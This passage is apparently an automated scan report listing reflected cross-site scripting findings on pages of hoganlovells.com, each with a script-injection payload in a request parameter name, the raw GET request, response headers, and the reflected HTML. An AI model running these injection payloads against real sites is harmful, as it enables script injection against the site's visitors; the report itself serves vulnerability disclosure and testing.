<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="c
...[SNIP]...
<input type="text" name="this" value="/favicon.ico5ed25"><script>alert(1)</script>b6c02b9894" size="60">
...[SNIP]...

4.135. http://www.hoganlovells.com/AboutUs/Online_Client_Service/Overview/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /AboutUs/Online_Client_Service/Overview/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2a27"><script>alert(1)</script>4c036e60d13 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /AboutUs/Online_Client_Service/Overview/?f2a27"><script>alert(1)</script>4c036e60d13=1 HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:18:40 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1221; path=/
Set-Cookie: PortletId=1295002; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EDT&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=eweajw55sht4c1afbrxbaf45; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 94183
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

...[SNIP]...
<a href="javascript:void(0);" onclick="window.open('http://www.hoganlovells.com/aboutus/online_client_service/overview/?f2a27"><script>alert(1)</script>4c036e60d13=1&print=true'); ">
...[SNIP]...

4.136. http://www.hoganlovells.com/aboutus/history/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /aboutus/history/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7bebc"><script>alert(1)</script>e3fcc433cbe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /aboutus/history/?7bebc"><script>alert(1)</script>e3fcc433cbe=1 HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:18:36 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A66
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1071; path=/
Set-Cookie: PortletId=9201; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EDT&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=uz23b055gmgirib1s10jpge4; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 97428
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65c45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

...[SNIP]...
<a href="javascript:void(0);" onclick="window.open('http://www.hoganlovells.com/aboutus/history/?7bebc"><script>alert(1)</script>e3fcc433cbe=1&print=true'); ">
...[SNIP]...

4.137. http://www.hoganlovells.com/aboutus/overview/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /aboutus/overview/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b55b2"><script>alert(1)</script>1f8b9cb08b8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /aboutus/overview/?b55b2"><script>alert(1)</script>1f8b9cb08b8=1 HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:18:39 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1068; path=/
Set-Cookie: PortletId=6201; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EDT&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=4ljypr45ttlk0ufexlwxwq55; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 94280
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

...[SNIP]...
<a href="javascript:void(0);" onclick="window.open('http://www.hoganlovells.com/aboutus/overview/?b55b2"><script>alert(1)</script>1f8b9cb08b8=1&print=true'); ">
...[SNIP]...

4.138. http://www.hoganlovells.com/newsmedia/awardsrankings [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /newsmedia/awardsrankings

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 404ee"><script>alert(1)</script>3132bf1a85b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /newsmedia/awardsrankings?404ee"><script>alert(1)</script>3132bf1a85b=1 HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:19:43 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1187; path=/
Set-Cookie: PortletId=1198201; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EDT&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=1srtawrostncgq24dtz2r1b4; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 249076
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

...[SNIP]...
<a href="javascript:void(0);" onclick="window.open('http://www.hoganlovells.com/newsmedia/awardsrankings/?404ee"><script>alert(1)</script>3132bf1a85b=1&print=true'); ">
...[SNIP]...

4.139. http://www.hoganlovells.com/newsmedia/awardsrankings/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /newsmedia/awardsrankings/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9966e"><script>alert(1)</script>9e3a488b625 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newsmedia/awardsrankings/?9966e"><script>alert(1)</script>9e3a488b625=1 HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:19:53 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A66
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1187; path=/
Set-Cookie: PortletId=1198201; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EDT&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=tgdjch55xqhztw2ucnfzrw45; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 249076
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65c45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

...[SNIP]...
<a href="javascript:void(0);" onclick="window.open('http://www.hoganlovells.com/newsmedia/awardsrankings/?9966e"><script>alert(1)</script>9e3a488b625=1&print=true'); ">
...[SNIP]...

4.140. http://www.hoganlovells.com/newsmedia/fastfacts/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /newsmedia/fastfacts/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 984c4"><script>alert(1)</script>9caa5b51498 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newsmedia/fastfacts/?984c4"><script>alert(1)</script>9caa5b51498=1 HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:18:58 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A66
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1188; path=/
Set-Cookie: PortletId=1199201; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EDT&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=3pnj2rusybze5e45ktwtjc45; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 95510
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65c45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

...[SNIP]...
<a href="javascript:void(0);" onclick="window.open('http://www.hoganlovells.com/newsmedia/fastfacts/?984c4"><script>alert(1)</script>9caa5b51498=1&print=true'); ">
...[SNIP]...

4.141. http://www.hoganlovells.com/newsmedia/newspubs [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /newsmedia/newspubs

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff387"><script>alert(1)</script>f5129b0d7e4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /newsmedia/newspubs?ff387"><script>alert(1)</script>f5129b0d7e4=1 HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:19:44 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1186; path=/
Set-Cookie: PortletId=1197201; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EDT&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=0afkoditkupm0a45bsb3rl55; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 259890
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

...[SNIP]...
<a href="javascript:void(0);" onclick="window.open('http://www.hoganlovells.com/newsmedia/newspubs/?ff387"><script>alert(1)</script>f5129b0d7e4=1&print=true'); ">
...[SNIP]...

4.142. http://www.hoganlovells.com/newsmedia/newspubs/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /newsmedia/newspubs/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ddef3"><script>alert(1)</script>32ec83aedd1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newsmedia/newspubs/?ddef3"><script>alert(1)</script>32ec83aedd1=1 HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:19:57 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1186; path=/
Set-Cookie: PortletId=1197201; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EDT&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=nqxi0l45ugjikt45htjgkszm; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 259890
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

...[SNIP]...
<a href="javascript:void(0);" onclick="window.open('http://www.hoganlovells.com/newsmedia/newspubs/?ddef3"><script>alert(1)</script>32ec83aedd1=1&print=true'); ">
...[SNIP]...

4.143. http://www.hoganlovells.com/newsmedia/newspubs/List.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /newsmedia/newspubs/List.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6781"><script>alert(1)</script>141a5cc1321 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newsmedia/newspubs/List.aspx?f6781"><script>alert(1)</script>141a5cc1321=1 HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:19:13 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1186; path=/
Set-Cookie: PortletId=1197201; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EDT&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=gnqers55ubowfiv34xrwdf55; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 166775
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

...[SNIP]...
<a href="javascript:void(0);" onclick="window.open('http://www.hoganlovells.com/newsmedia/newspubs/List.aspx?f6781"><script>alert(1)</script>141a5cc1321=1&print=true'); ">
...[SNIP]...

4.144. http://www.hoganlovells.com/newsmedia/timeline/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /newsmedia/timeline/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2644c"><script>alert(1)</script>bedf04dc077 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newsmedia/timeline/?2644c"><script>alert(1)</script>bedf04dc077=1 HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:19:07 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1189; path=/
Set-Cookie: PortletId=1200201; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EDT&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=fosfrm45vostudiwypgxb155; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 114381
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

...[SNIP]...
<a href="javascript:void(0);" onclick="window.open('http://www.hoganlovells.com/newsmedia/timeline/?2644c"><script>alert(1)</script>bedf04dc077=1&print=true'); ">
...[SNIP]...

4.145. http://www.hoganlovells.com/ourpeople/List.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /ourpeople/List.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec2f0"><script>alert(1)</script>2daf70c6706 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ourpeople/List.aspx?ec2f0"><script>alert(1)</script>2daf70c6706=1 HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:23:27 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1075; path=/
Set-Cookie: PortletId=13201; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
